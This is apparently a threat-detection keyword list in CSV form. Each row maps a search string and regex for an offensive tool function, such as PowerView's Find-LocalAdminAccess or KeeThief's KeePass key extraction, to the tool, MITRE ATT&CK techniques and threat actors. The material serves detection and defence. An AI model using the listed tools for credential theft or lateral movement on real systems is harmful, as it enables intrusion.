"*Find-KeePassconfig*",".{0,1000}Find\-KeePassconfig.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45071" "*Find-KeePassconfig*",".{0,1000}Find\-KeePassconfig.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","45072" "*Find-LAPSDelegatedGroups 
*",".{0,1000}Find\-LAPSDelegatedGroups\s.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","0","N/A","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","45073" "*Find-LocalAdminAccess *",".{0,1000}Find\-LocalAdminAccess\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45074" "*Find-LocalAdminAccess *",".{0,1000}Find\-LocalAdminAccess\s.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","45075" "*findlocaladminaccess*",".{0,1000}findlocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","45077" "*findlocaladminaccess*",".{0,1000}findlocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45078" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45079" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","45080" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - 
APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45081" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45082" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45083" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45084" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - 
T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45085" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45086" "*Find-LocalAdminAccess.ps1*",".{0,1000}Find\-LocalAdminAccess\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45087" "*Find-LogonScriptCredentials -LogonScripts*",".{0,1000}Find\-LogonScriptCredentials\s\-LogonScripts.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential 
Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45088" "*Find-LogonScriptCredentials.ps1*",".{0,1000}Find\-LogonScriptCredentials\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45089" "*FindModule *.dll*",".{0,1000}FindModule\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","N/A","10","10","268","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z","45090" "*FindObjects-BOF*",".{0,1000}FindObjects\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY 
BEAR - Sandworm","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","N/A","10","10","268","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z","45091" "*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45092" 
"*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","45093" "*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45094" "*Find-PathHijack*",".{0,1000}Find\-PathHijack.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45095" "*Find-PotentiallyCrackableAccounts.json*",".{0,1000}Find\-PotentiallyCrackableAccounts\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","45096" 
"*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - 